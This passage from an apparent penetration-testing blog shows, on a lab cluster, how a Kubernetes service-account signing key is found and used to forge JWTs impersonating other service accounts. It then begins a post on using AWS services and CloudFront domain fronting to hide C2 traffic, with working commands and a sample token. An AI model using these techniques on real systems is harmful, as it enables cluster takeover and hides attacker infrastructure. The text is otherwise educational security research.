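# Standard in-pod location of the service account JWT
TOKEN_PATH = '/run/secrets/kubernetes.io/serviceaccount/token'

def b64url_decode(data):
    # Pad to a multiple of 4 before URL-safe base64 decoding
    return base64.urlsafe_b64decode(data + '=' * (-len(data) % 4))

token = open(TOKEN_PATH).read().strip()
header, claims, _signature = token.split('.')
print(json.dumps(json.loads(b64url_decode(header)), indent=2))
print(json.dumps(json.loads(b64url_decode(claims)), indent=2))
</code></pre></div></div>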
<p>Similar to what we did for client certificates, we can also use curl to authenticate to the Kubernetes API with the JWT, which will allow us to more easily test our own tokens once we create them.</p>
<p>We do this by using the <code class="language-plaintext highlighter-rouge">Authorization</code> header to send the token in our HTTP requests to the API server as a <code class="language-plaintext highlighter-rouge">Bearer</code> token. This header would look like the following:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Authorization: Bearer eyJhbGciOiJSUzI1NiIsImtpZCI6IlNNVFRFSHNnOVoxcVNZZzd6d3hnZTZPcDczWHVFZHYxY19BcFEwQVh6REkifQ.eyJhdWQiOlsiaHR0cHM6Ly9rdWJlcm5ldGVzLmRlZmF1bHQuc3ZjLmNsdXN0ZXIubG9jYWwiXSwiZXhwIjoxNzMxNTY0OTY2LCJpYXQiOjE3MDAwMjg5NjYsImlzcyI6Imh0dHBzOi8va3ViZXJuZXRlcy5kZWZhdWx0LnN2Yy5jbHVzdGVyLmxvY2FsIiwia3ViZXJuZXRlcy5pbyI6eyJuYW1lc3BhY2UiOiJkZWZhdWx0IiwicG9kIjp7Im5hbWUiOiJuZ2lueC1hcHAtNTc3N2I1Zjk1LTk3NDg5IiwidWlkIjoiNTJhNzEwNWEtZmNmZi00OWMyLTk3NTktMTgxNWJkMDc4ZmQ3In0sInNlcnZpY2VhY2NvdW50Ijp7Im5hbWUiOiJkZWZhdWx0IiwidWlkIjoiZGZhMTNjZWItNTE2MC00YTFhLTk4MDMtMDQ5ZTQ4NzNhNjA5In0sIndhcm5hZnRlciI6MTcwMDAzMjU3M30sIm5iZiI6MTcwMDAyODk2Niwic3ViIjoic3lzdGVtOnNlcnZpY2VhY2NvdW50OmRlZmF1bHQ6ZGVmYXVsdCJ9.uk7ccvYio_a8lwLk_PAPlxf7HHRuVqvuStTNIzKfwRI4NASgs6Ywn8dBpgYSoyhnYbSKJ6rVb0WsvbfFJMUE4uUUv8RqeaJFiNvRjx2JIkLL6BDp_HAaLGAg257pPj-PrHjCAL2ANEy604rIotAietyEytEBgmRjgA2IRVRsQdSCPaq_PPbBmpPrBo0Uv9wEpFObPpp_31cmzVgYJSvyrAEkHK33EY5wgNLmv2WF-IbEkj57AgBC_D3uGCOZWmjXCaNyhlWOSgVb8nGCnC63QzP1BnMvBkF6W6XnoxG04KWUzTAQxmORnXqtxUPgAEvGsXBFKVt9mKnGD4aWmJBNPA
</code></pre></div></div>
<p>Here’s how that’s done in curl, reading the CA cert and token from their files on disk.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>root@nginx-app-5777b5f95-97489:/# curl --cacert /run/secrets/kubernetes.io/serviceaccount/ca.crt -H "Authorization: Bearer $(cat /run/secrets/kubernetes.io/serviceaccount/token)" https://kubernetes.default.svc.cluster.local/api
{
"kind": "APIVersions",
"versions": [
"v1"
],
"serverAddressByClientCIDRs": [
{
"clientCIDR": "0.0.0.0/0",
"serverAddress": "192.168.10.123:6443"
}
]
}
</code></pre></div></div>
<h2 id="identifying-the-jwt-key">Identifying the JWT key</h2>
<p>Let’s exit out of the container and work on the host again. The first thing we will do is install a command line JWT tool that we can use to verify tokens and thus identify the key that was used for signing.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>root@nginx-app-5777b5f95-97489:/# exit
exit
(crypto) stephen@kubemaster:~/certs$ sudo apt install jwt
[....SNIP....]
</code></pre></div></div>
<p>With that installed we are ready to start testing keys.</p>
<p>The <code class="language-plaintext highlighter-rouge">RS256</code> algorithm signs tokens using the RSA private key and verifies them using the public key. To find the keypair that is being used in this Kubernetes system for creating JWTs such as our reference token shown above, we can take an existing token and try to verify it using a candidate public key. If it passes verification, it’s the right key.</p>
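<p>The same check can be sketched in Python using the PyJWT library, if you’d rather script it than use a CLI tool. This is a rough example only, assuming PyJWT is installed with its crypto extras (<code class="language-plaintext highlighter-rouge">pip install pyjwt[crypto]</code>) and that the token and candidate public key have been written to the hypothetical files <code class="language-plaintext highlighter-rouge">token</code> and <code class="language-plaintext highlighter-rouge">candidate.pub</code>:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>import jwt  # PyJWT

token = open('token').read().strip()
candidate_key = open('candidate.pub').read()

try:
    # Skip audience/expiry checks - we only care whether the signature matches
    jwt.decode(token, candidate_key, algorithms=['RS256'],
               options={'verify_aud': False, 'verify_exp': False})
    print('Signature verified - this is the signing keypair')
except jwt.InvalidSignatureError:
    print('Verification failed - try another candidate key')
</code></pre></div></div>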
<p>As mentioned above, it is also possible in the case of Kubernetes to identify the key being used to sign a JWT by algorithmically generating the key ID from a candidate public key and comparing it to the <code class="language-plaintext highlighter-rouge">kid</code> value in the JWT header. However, since I also want this post to serve as an example guide for assessing cryptosystems in general, it is worth noting that this approach is not universally applicable (algorithmically generated key IDs are not used in all systems), so the more straightforward method of attempting to verify the JWT using candidate public keys is probably preferable.</p>
<p>Since we already have the CA key for the Kubernetes system, retrieved in our last section, we can try that for verification to see if it’s the correct key. (Spoiler alert: this is NOT the correct key, but let’s go through the process anyway.)</p>
<p>Let’s write the token to a file on our host, extract the public key from the CA private key to its own file and try to use it to verify our token.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>(crypto) stephen@kubemaster:~/certs$ echo 'eyJhbGciOiJSUzI1NiIsImtpZCI6IlNNVFRFSHNnOVoxcVNZZzd6d3hnZTZPcDczWHVFZHYxY19BcFEwQVh6REkifQ.eyJhdWQiOlsiaHR0cHM6Ly9rdWJlcm5ldGVzLmRlZmF1bHQuc3ZjLmNsdXN0ZXIubG9jYWwiXSwiZXhwIjoxNzMxNTY0OTY2LCJpYXQiOjE3MDAwMjg5NjYsImlzcyI6Imh0dHBzOi8va3ViZXJuZXRlcy5kZWZhdWx0LnN2Yy5jbHVzdGVyLmxvY2FsIiwia3ViZXJuZXRlcy5pbyI6eyJuYW1lc3BhY2UiOiJkZWZhdWx0IiwicG9kIjp7Im5hbWUiOiJuZ2lueC1hcHAtNTc3N2I1Zjk1LTk3NDg5IiwidWlkIjoiNTJhNzEwNWEtZmNmZi00OWMyLTk3NTktMTgxNWJkMDc4ZmQ3In0sInNlcnZpY2VhY2NvdW50Ijp7Im5hbWUiOiJkZWZhdWx0IiwidWlkIjoiZGZhMTNjZWItNTE2MC00YTFhLTk4MDMtMDQ5ZTQ4NzNhNjA5In0sIndhcm5hZnRlciI6MTcwMDAzMjU3M30sIm5iZiI6MTcwMDAyODk2Niwic3ViIjoic3lzdGVtOnNlcnZpY2VhY2NvdW50OmRlZmF1bHQ6ZGVmYXVsdCJ9.uk7ccvYio_a8lwLk_PAPlxf7HHRuVqvuStTNIzKfwRI4NASgs6Ywn8dBpgYSoyhnYbSKJ6rVb0WsvbfFJMUE4uUUv8RqeaJFiNvRjx2JIkLL6BDp_HAaLGAg257pPj-PrHjCAL2ANEy604rIotAietyEytEBgmRjgA2IRVRsQdSCPaq_PPbBmpPrBo0Uv9wEpFObPpp_31cmzVgYJSvyrAEkHK33EY5wgNLmv2WF-IbEkj57AgBC_D3uGCOZWmjXCaNyhlWOSgVb8nGCnC63QzP1BnMvBkF6W6XnoxG04KWUzTAQxmORnXqtxUPgAEvGsXBFKVt9mKnGD4aWmJBNPA' > token
(crypto) stephen@kubemaster:~/certs$ openssl rsa -in ca.key -pubout -out ca.pub
writing RSA key
(crypto) stephen@kubemaster:~/certs$ jwt -alg RS256 -key ca.pub -verify token
Error: couldn't parse token: crypto/rsa: verification error
</code></pre></div></div>
<p>OK, no good. As it turns out, there is a dedicated keypair for signing service account tokens in Kubernetes. In our sample Kubernetes system there are two pods that reference it - the API server and the controller manager.</p>
<p>Let’s grab the names of the appropriate pods (they will be different depending on your Kubernetes server’s hostname).</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>(crypto) stephen@kubemaster:~/certs$ kubectl get pods -n kube-system
NAME READY STATUS RESTARTS AGE
calico-kube-controllers-658d97c59c-88r9c 1/1 Running 0 7d5h
calico-node-fwptx 1/1 Running 0 7d5h
coredns-5dd5756b68-snhk5 1/1 Running 0 7d5h
coredns-5dd5756b68-vlb88 1/1 Running 0 7d5h
etcd-kubemaster.thezoo.local 1/1 Running 0 7d5h
kube-apiserver-kubemaster.thezoo.local 1/1 Running 0 7d5h
kube-controller-manager-kubemaster.thezoo.local 1/1 Running 0 7d5h
kube-proxy-w2xfd 1/1 Running 0 7d5h
kube-scheduler-kubemaster.thezoo.local 1/1 Running 0 7d5h
</code></pre></div></div>
<p>Now, given the names of the pods, we can find the location of the key by looking at the <code class="language-plaintext highlighter-rouge">service-account-private-key-file</code> (kube-controller-manager pod) or <code class="language-plaintext highlighter-rouge">service-account-signing-key-file</code> (kube-apiserver pod) parameters.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>(crypto) stephen@kubemaster:~/certs$ kubectl describe pods -n kube-system kube-controller-manager-kubemaster.thezoo.local | grep 'service-account'
--service-account-private-key-file=/etc/kubernetes/pki/sa.key
--use-service-account-credentials=true
(crypto) stephen@kubemaster:~/certs$ kubectl describe pods -n kube-system kube-apiserver-kubemaster.thezoo.local | grep 'service-account'
--service-account-issuer=https://kubernetes.default.svc.cluster.local
--service-account-key-file=/etc/kubernetes/pki/sa.pub
--service-account-signing-key-file=/etc/kubernetes/pki/sa.key
</code></pre></div></div>
<p>The file we are after is <code class="language-plaintext highlighter-rouge">/etc/kubernetes/pki/sa.key</code>. Let’s grab it, change ownership, extract the public key to its own file and retry verification.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>(crypto) stephen@kubemaster:~/certs$ sudo cp /etc/kubernetes/pki/sa.key .
(crypto) stephen@kubemaster:~/certs$ sudo chown stephen:stephen sa.key
(crypto) stephen@kubemaster:~/certs$ openssl rsa -in sa.key -pubout -out sa.pub
writing RSA key
(crypto) stephen@kubemaster:~/certs$ jwt -alg RS256 -key sa.pub -verify token
{
"aud": [
"https://kubernetes.default.svc.cluster.local"
],
"exp": 1731564966,
"iat": 1700028966,
"iss": "https://kubernetes.default.svc.cluster.local",
"kubernetes.io": {
"namespace": "default",
"pod": {
"name": "nginx-app-5777b5f95-97489",
"uid": "52a7105a-fcff-49c2-9759-1815bd078fd7"
},
"serviceaccount": {
"name": "default",
"uid": "dfa13ceb-5160-4a1a-9803-049e4873a609"
},
"warnafter": 1700032573
},
"nbf": 1700028966,
"sub": "system:serviceaccount:default:default"
}
</code></pre></div></div>
<p>OK, this output of the claims data from the JWT means we have found the correct key.</p>
<h2 id="creating-our-own-tokens">Creating our own tokens</h2>
<p>Let’s write the claims data from the previous output to a file so we have something to work with.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>(crypto) stephen@kubemaster:~/certs$ jwt -alg RS256 -key sa.pub -verify token > claims
(crypto) stephen@kubemaster:~/certs$ cat claims
{
"aud": [
"https://kubernetes.default.svc.cluster.local"
],
"exp": 1731564966,
"iat": 1700028966,
"iss": "https://kubernetes.default.svc.cluster.local",
"kubernetes.io": {
"namespace": "default",
"pod": {
"name": "nginx-app-5777b5f95-97489",
"uid": "52a7105a-fcff-49c2-9759-1815bd078fd7"
},
"serviceaccount": {
"name": "default",
"uid": "dfa13ceb-5160-4a1a-9803-049e4873a609"
},
"warnafter": 1700032573
},
"nbf": 1700028966,
"sub": "system:serviceaccount:default:default"
}
</code></pre></div></div>
<p>Now let’s try and create our own token using these claims, and test it using curl to confirm we have a working signing process.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>(crypto) stephen@kubemaster:~/certs$ jwt -alg RS256 -header 'kid=SMTTEHsg9Z1qSYg7zwxge6Op73XuEdv1c_ApQ0AXzDI' -key sa.key -sign claims >forged_token
(crypto) stephen@kubemaster:~/certs$ curl --cacert ca.crt -H "Authorization: Bearer $(cat forged_token)" https://kubemaster.thezoo.local:6443/api
{
"kind": "APIVersions",
"versions": [
"v1"
],
"serverAddressByClientCIDRs": [
{
"clientCIDR": "0.0.0.0/0",
"serverAddress": "192.168.10.123:6443"
}
]
}
</code></pre></div></div>
<p>Success! This proves we have a working key and that our method of generating tokens is compatible. However, all we have done so far is recreate the existing token we already had, copying its details verbatim. What if we want to forge arbitrary tokens?</p>
<p>First, how can we derive the kid to use from the public key? (This is not necessary in this case, as only one key is in use in the system and we could simply exclude the <code class="language-plaintext highlighter-rouge">kid</code> field from the JWT header and still have it work, but we will do it for completeness and to provide another way to identify keys.)</p>
<p>This value is actually the sha256 hash of the DER form of the public key, URL-safe base64 encoded. Here is how to derive it on the command line:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>(crypto) stephen@kubemaster:~/certs$ openssl rsa -pubin -outform der -in sa.pub 2>/dev/null | openssl sha256 -binary | basenc --base64url | sed --expression 's/=//g'
SMTTEHsg9Z1qSYg7zwxge6Op73XuEdv1c_ApQ0AXzDI
</code></pre></div></div>
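<p>As a rough Python equivalent of the openssl pipeline above (assuming the <code class="language-plaintext highlighter-rouge">cryptography</code> library is available), the derivation looks like this:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>import base64
import hashlib
from cryptography.hazmat.primitives import serialization

# Load the PEM public key and re-serialize it in DER (SubjectPublicKeyInfo) form
pub = serialization.load_pem_public_key(open('sa.pub', 'rb').read())
der = pub.public_bytes(
    encoding=serialization.Encoding.DER,
    format=serialization.PublicFormat.SubjectPublicKeyInfo,
)
# kid = URL-safe base64 of the SHA-256 hash of the DER bytes, padding stripped
print(base64.urlsafe_b64encode(hashlib.sha256(der).digest()).rstrip(b'=').decode())
</code></pre></div></div>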
<p>Let’s trim the claims data down to a more minimal form, so we are not wasting time reproducing extra data we don’t need. By trial and error, this is the minimised version of what’s needed in the claims section of the JWT that I came up with.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>(crypto) stephen@kubemaster:~/certs$ cat claimsmod
{
"aud": [
"https://kubernetes.default.svc.cluster.local"
],
"exp": 1731564966,
"iat": 1700028966,
"iss": "https://kubernetes.default.svc.cluster.local",
"kubernetes.io": {
"namespace": "default",
"serviceaccount": {
"name": "default",
"uid": "dfa13ceb-5160-4a1a-9803-049e4873a609"
}
},
"nbf": 1700028966,
"sub": "system:serviceaccount:default:default"
}
(crypto) stephen@kubemaster:~/certs$ jwt -alg RS256 -header 'kid=SMTTEHsg9Z1qSYg7zwxge6Op73XuEdv1c_ApQ0AXzDI' -key sa.key -sign claimsmod >forged_token2
(crypto) stephen@kubemaster:~/certs$ curl --cacert ca.crt -H "Authorization: Bearer $(cat forged_token2)" https://kubemaster.thezoo.local:6443/api
{
"kind": "APIVersions",
"versions": [
"v1"
],
"serverAddressByClientCIDRs": [
{
"clientCIDR": "0.0.0.0/0",
"serverAddress": "192.168.10.123:6443"
}
]
}
</code></pre></div></div>
<p>The <code class="language-plaintext highlighter-rouge">exp</code> (expiry), <code class="language-plaintext highlighter-rouge">iat</code> (issued at) and <code class="language-plaintext highlighter-rouge">nbf</code> (not before) values in the sample above are all epoch timestamps and represent the time period within which the generated token will be valid. I didn’t need to change these for this example, but once the current time is past the <code class="language-plaintext highlighter-rouge">exp</code> value you will need to update them for the tokens to be valid. When that becomes necessary, you can generate a timestamp for the current time like so for <code class="language-plaintext highlighter-rouge">iat</code> and <code class="language-plaintext highlighter-rouge">nbf</code>, and then add a large number of seconds to it (in this example 31536000, one year) for <code class="language-plaintext highlighter-rouge">exp</code>.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>stephen@kubemaster:~$ date +%s
1700045771
</code></pre></div></div>
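<p>The equivalent calculation in Python, generating fresh <code class="language-plaintext highlighter-rouge">iat</code>/<code class="language-plaintext highlighter-rouge">nbf</code> values and an <code class="language-plaintext highlighter-rouge">exp</code> one year (31536000 seconds) in the future, might look like:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>import time

now = int(time.time())
print('iat/nbf:', now)         # token valid from now
print('exp:', now + 31536000)  # token expires one year from now
</code></pre></div></div>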
<p>Now that our claims data is minimised, what if we want to create a token for a different service account? Here are the accounts in the system:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>(crypto) stephen@kubemaster:~/certs$ kubectl get sa --all-namespaces
NAMESPACE NAME SECRETS AGE
default default 0 7d7h
kube-node-lease default 0 7d7h
kube-public default 0 7d7h
kube-system attachdetach-controller 0 7d7h
kube-system bootstrap-signer 0 7d7h
kube-system calico-kube-controllers 0 7d7h
kube-system calico-node 0 7d7h
kube-system certificate-controller 0 7d7h
kube-system clusterrole-aggregation-controller 0 7d7h
kube-system coredns 0 7d7h
kube-system cronjob-controller 0 7d7h
kube-system daemon-set-controller 0 7d7h
kube-system default 0 7d7h
kube-system deployment-controller 0 7d7h
kube-system disruption-controller 0 7d7h
kube-system endpoint-controller 0 7d7h
kube-system endpointslice-controller 0 7d7h
kube-system endpointslicemirroring-controller 0 7d7h
kube-system ephemeral-volume-controller 0 7d7h
kube-system expand-controller 0 7d7h
kube-system generic-garbage-collector 0 7d7h
kube-system horizontal-pod-autoscaler 0 7d7h
kube-system job-controller 0 7d7h
kube-system kube-proxy 0 7d7h
kube-system namespace-controller 0 7d7h
kube-system node-controller 0 7d7h
kube-system persistent-volume-binder 0 7d7h
kube-system pod-garbage-collector 0 7d7h
kube-system pv-protection-controller 0 7d7h
kube-system pvc-protection-controller 0 7d7h
kube-system replicaset-controller 0 7d7h
kube-system replication-controller 0 7d7h
kube-system resourcequota-controller 0 7d7h
kube-system root-ca-cert-publisher 0 7d7h
kube-system service-account-controller 0 7d7h
kube-system service-controller 0 7d7h
kube-system statefulset-controller 0 7d7h
kube-system token-cleaner 0 7d7h
kube-system ttl-after-finished-controller 0 7d7h
kube-system ttl-controller 0 7d7h
</code></pre></div></div>
<p>Let’s try and impersonate the <code class="language-plaintext highlighter-rouge">service-account-controller</code> account. To successfully modify the basic claims template to work for this account we need to know the account name (<code class="language-plaintext highlighter-rouge">service-account-controller</code>), the namespace (<code class="language-plaintext highlighter-rouge">kube-system</code> from the output above) and the uid.</p>
<p>The uid is the only value we don’t have, but we can get this from the API in a number of ways, including the following:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>(crypto) stephen@kubemaster:~/certs$ kubectl get sa service-account-controller -n kube-system -o jsonpath='{.metadata.uid}'
2eb4a3d0-9756-4d13-ab07-69a062998a26
</code></pre></div></div>
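<p>As an alternative sketch, the same uid could be read directly from the API using Python’s <code class="language-plaintext highlighter-rouge">requests</code> module, assuming you have a token with sufficient permissions to read service accounts (here reusing the CA cert and a working token from the earlier examples):</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>import requests

token = open('forged_token2').read().strip()
resp = requests.get(
    'https://kubemaster.thezoo.local:6443/api/v1/namespaces/kube-system'
    '/serviceaccounts/service-account-controller',
    headers={'Authorization': 'Bearer ' + token},
    verify='ca.crt',  # validate the API server cert against the cluster CA
)
print(resp.json()['metadata']['uid'])
</code></pre></div></div>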
<p>The new claims data with the previously mentioned values inserted looks like the following:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>(crypto) stephen@kubemaster:~/certs$ cat claimssc
{
"aud": [
"https://kubernetes.default.svc.cluster.local"
],
"exp": 1731564966,
"iat": 1700028966,
"iss": "https://kubernetes.default.svc.cluster.local",
"kubernetes.io": {
"namespace": "kube-system",
"serviceaccount": {
"name": "service-account-controller",
"uid": "2eb4a3d0-9756-4d13-ab07-69a062998a26"
}
},
"nbf": 1700028966,
"sub": "system:serviceaccount:kube-system:service-account-controller"
}
</code></pre></div></div>
<p>Now let’s create a new token and test it against the API:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>(crypto) stephen@kubemaster:~/certs$ jwt -alg RS256 -header 'kid=SMTTEHsg9Z1qSYg7zwxge6Op73XuEdv1c_ApQ0AXzDI' -key sa.key -sign claimssc >forged_token3
(crypto) stephen@kubemaster:~/certs$ curl --cacert ca.crt -H "Authorization: Bearer $(cat forged_token3)" https://kubemaster.thezoo.local:6443/api
{
"kind": "APIVersions",
"versions": [
"v1"
],
"serverAddressByClientCIDRs": [
{
"clientCIDR": "0.0.0.0/0",
"serverAddress": "192.168.10.123:6443"
}
]
}
</code></pre></div></div>
<p>Success!</p>
<p>If you’d prefer to work in Python, the <a href="https://raw.githubusercontent.com/stephenbradshaw/pentesting_stuff/master/example_code/crypto_helpers.py">Python helper code</a> referenced in the previous section on user certificates also includes functions to help perform the JWT analysis and creation that we just did from the command line.</p>Stephen BradshawIn this post I’m going to do a deep dive into two of the most commonly used authentication mechanisms for Kubernetes.AWS Service Command and Control HTTP traffic forwarding2023-08-30T07:04:00+00:002023-08-30T07:04:00+00:00/2023/08/30/aws-service-C2-forwarding<p>Recently I’ve been looking into options for abusing AWS services to forward HTTP Command and Control (C2) traffic. This post will talk about a number of approaches for this I found discussed on the Internet as well as a few options that I identified myself.</p>
<p>For those not familiar with how most modern C2 systems work, an overview of their operation might be helpful. Skip ahead a paragraph if you are already familiar with the way C2 systems are designed.</p>
<p>A Command and Control system provides an interface by which commands can be run on already compromised computers in order for attackers to achieve their goals. Specific terms vary, but C2 architecture normally consists of implants that run on compromised devices and run commands, interfaces that attackers can use to issue commands to be run on compromised devices, and servers that coordinate communications between the two. The C2 server normally sits in a location reachable from the Internet, so victim systems with the C2 implant installed can communicate back to the server to ask for instructions. Depending on the C2 software in question, there will be one or more protocols supported for this purpose. The protocols chosen are repurposed, in that they were originally designed and used for some other benign purpose. This repurposing is done deliberately in order to make the C2 implant communications blend into normal network traffic. The most commonly supported protocol for implant to server communication in modern C2 systems is HTTP/S.</p>
<p>The use of HTTP/S by C2 is not the only way this protocol is abused for malicious activity, so defenders are paying attention. One approach to try and identify abuse of the protocol is to check the “reputation” of HTTP/S traffic destinations using a source like <a href="https://urlfiltering.paloaltonetworks.com/query/">this</a> (other sources are available). By making use of AWS services that can proxy HTTP traffic, the operator of a C2 server can take advantage of the comparatively “good” reputation of the URLs associated with those AWS services to try and avoid detection. So, my question was, what AWS services can be used in this manner?</p>
<h1 id="previous-work">Previous work</h1>
<p>I started off this exercise by looking for existing writeups on the topic. I considered out of scope anything that required custom C2 implant communications (e.g. <a href="https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/topics/listener-infrastructure_external-c2.htm?cshid=1043">External C2</a>). I wanted forwarding of plain old HTTP/S to give me the widest possible range of options in C2 servers that could be put behind this without requiring code changes.</p>
<p>After a few hours of research, I found the following:</p>
<ul>
<li><a href="https://blog.xpnsec.com/aws-lambda-redirector/">This post</a> by Adam Chester which talks about using the <a href="https://serverless.com/">Serverless framework</a> to create an <a href="https://aws.amazon.com/lambda/">AWS Lambda</a> that will receive traffic from the <a href="https://aws.amazon.com/api-gateway/">AWS API Gateway</a> and then forward it to another arbitrary destination. In Adam’s example, he forwards the traffic using ngrok to a local web server, but this approach could be used to point to an EC2 instance in the same AWS account or another server on the Internet.</li>
<li><a href="https://scottctaylor12.github.io/lambda-function-urls.html">This post</a> from Scott Taylor which again uses a Lambda to perform traffic redirection, but this time the entry point is via <a href="https://docs.aws.amazon.com/lambda/latest/dg/lambda-urls.html">Lambda function URLs</a> instead of the API Gateway. There is associated code/instructions to deploy this Lambda to AWS as well as to create an EC2 instance to forward the traffic to.</li>
<li>Many posts on using a <a href="https://aws.amazon.com/cloudfront/">CloudFront distribution</a> and domain fronting to receive traffic from CloudFront sites and send them to a C2 server somewhere else. Some examples are <a href="https://www.cobaltstrike.com/blog/high-reputation-redirectors-and-domain-fronting">this</a>, <a href="https://digi.ninja/blog/cloudfront_example.php">this</a> and <a href="https://www.mdsec.co.uk/2017/02/domain-fronting-via-cloudfront-alternate-domains/">this</a>. There are a bunch more too. This topic of domain fronting in CloudFront deserves a deeper dive, because things have changed….</li>
</ul>
<h1 id="a-note-on-domain-fronting-and-cloudfront">A note on Domain fronting and CloudFront</h1>
<p>Something that you will see repeated endlessly if you search on this topic is that you can use the CloudFront Content Delivery Network (CDN) to perform domain fronting for C2 services.</p>
<p>Domain fronting is a technique that attempts to hide the true destination of a HTTP request or redirect traffic to possibly restricted locations by abusing the HTTP routing capabilities of CDNs or certain other complex network environments. For version 1.1 of the protocol, HTTP involves a TCP connection being made to a destination server on a given IP address (normally associated with a domain name) and port, with additional TLS/SSL encryption support for the connection in HTTPS. Over this connection a structured plain text message is sent that requests a given resource and references a server in the <code class="language-plaintext highlighter-rouge">Host</code> header. Under normal circumstances the domain name associated with the TCP connection and the <code class="language-plaintext highlighter-rouge">Host</code> header in the HTTP message match. In domain fronting, the destination for the TCP connection domain name is set to a site that you want to appear to be visiting, and the <code class="language-plaintext highlighter-rouge">Host</code> header in the HTTP request is set to the location you actually want to visit. Both locations must be served by the same CDN.</p>
<p>The following curl command demonstrates in the simplest possible way how the approach is performed in suitable environments. In the example, <code class="language-plaintext highlighter-rouge">http://fakesite.cloudfront.net/</code> is what you want to <strong>appear</strong> to be visiting, and <code class="language-plaintext highlighter-rouge">http://actualsite.cloudfront.net</code> is where you actually want to go:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>curl -H 'Host: actualsite.cloudfront.net' http://fakesite.cloudfront.net/
</code></pre></div></div>
<p>In this example, any DNS requests resolved on the client side are resolving the “fake” address, and packet captures will show the TCP traffic going to that fake system’s IP address. If HTTPS is supported, and you use a <code class="language-plaintext highlighter-rouge">https://</code> URL, the actual destination you are visiting, located in the HTTP <code class="language-plaintext highlighter-rouge">Host</code> header, will also be hidden in the encrypted tunnel.</p>
<p>While this <strong>is</strong> a great way of hiding C2 traffic, various CDNs did crack down on the approach a few years ago due to the widespread practice of domain fronting being used to evade censorship restrictions. Some changes were rolled back in some cases, but as at the time of writing this simple approach to domain fronting <strong>does not work</strong> in CloudFront for HTTPS. If the DNS hostname that you connect to does not match any of the certificates you have associated with your CloudFront distribution, you will get the following error:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>The distribution does not match the certificate for which the HTTPS connection was established with.
</code></pre></div></div>
<p>This applies only to HTTPS - HTTP still works using the approach shown in the example above. However, given that HTTP has the <code class="language-plaintext highlighter-rouge">Host</code> header value exposed in the clear in network traffic, this leaves something to be desired when the purpose is hiding where you’re going. Depending on the capability of inspection devices, it might still be good enough for certain purposes however.</p>
<p>It is possible to make HTTPS domain fronting work on CloudFront via use of Server Name Indication <a href="https://www.cloudflare.com/en-gb/learning/ssl/what-is-sni/">(SNI)</a> to specify a Server Name value during the TLS negotiation that matches a certificate in your CloudFront distribution. In other words, you TCP connect via HTTPS to a fake site on the CDN and set the SNI servername for the TLS negotiation <strong>AND</strong> the HTTP <code class="language-plaintext highlighter-rouge">Host</code> header to your actual intended host.</p>
<p>Here’s how this connection looks using openssl.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>openssl s_client -quiet -connect fakesite.cloudfront.net:443 -servername actualsite.cloudfront.net < request.txt
depth=2 C = US, O = Amazon, CN = Amazon Root CA 1
verify return:1
depth=1 C = US, O = Amazon, CN = Amazon RSA 2048 M01
verify return:1
depth=0 CN = *.cloudfront.net
verify return:1
</code></pre></div></div>
<p>Where file <code class="language-plaintext highlighter-rouge">request.txt</code> contains something like the following:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>GET / HTTP/1.1
Host: actualsite.cloudfront.net
</code></pre></div></div>
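<p>For testing purposes, the same SNI trick can also be scripted with Python’s standard <code class="language-plaintext highlighter-rouge">ssl</code> module. A minimal sketch, using the same hypothetical host names as the example above:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>import socket
import ssl

fake = 'fakesite.cloudfront.net'      # name used for DNS resolution and the TCP connection
actual = 'actualsite.cloudfront.net'  # name presented in both the SNI field and the Host header

ctx = ssl.create_default_context()
with socket.create_connection((fake, 443)) as sock:
    # server_hostname sets the SNI value sent during the TLS handshake
    with ctx.wrap_socket(sock, server_hostname=actual) as tls:
        tls.sendall(('GET / HTTP/1.1\r\nHost: %s\r\nConnection: close\r\n\r\n' % actual).encode())
        print(tls.recv(4096).decode(errors='replace'))
</code></pre></div></div>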
<p>Unfortunately, I’m not aware of any C2 implant that supports specifying the TLS servername in a manner similar to what is shown above, so C2 HTTPS domain fronting using CloudFront is not currently a viable approach. However, this does not mean that CloudFront is completely unusable for C2. As already mentioned, you can do domain fronting via HTTP. It’s also possible to access the distribution via HTTPS using the <code class="language-plaintext highlighter-rouge"><name>.cloudfront.net</code> name that is created randomly for you when you set up your distribution. This domain does have a good trust profile in some URL categorisation databases.</p>
<h1 id="summary-of-identified-approaches">Summary of identified approaches</h1>
<p>With that diversion out of the way, let’s look at the complete list of options I identified for forwarding HTTP traffic using AWS services.</p>
<p>Here’s the list, including the aforementioned approaches I found discussed elsewhere on the Internet, and a few more I identified myself:</p>
<ul>
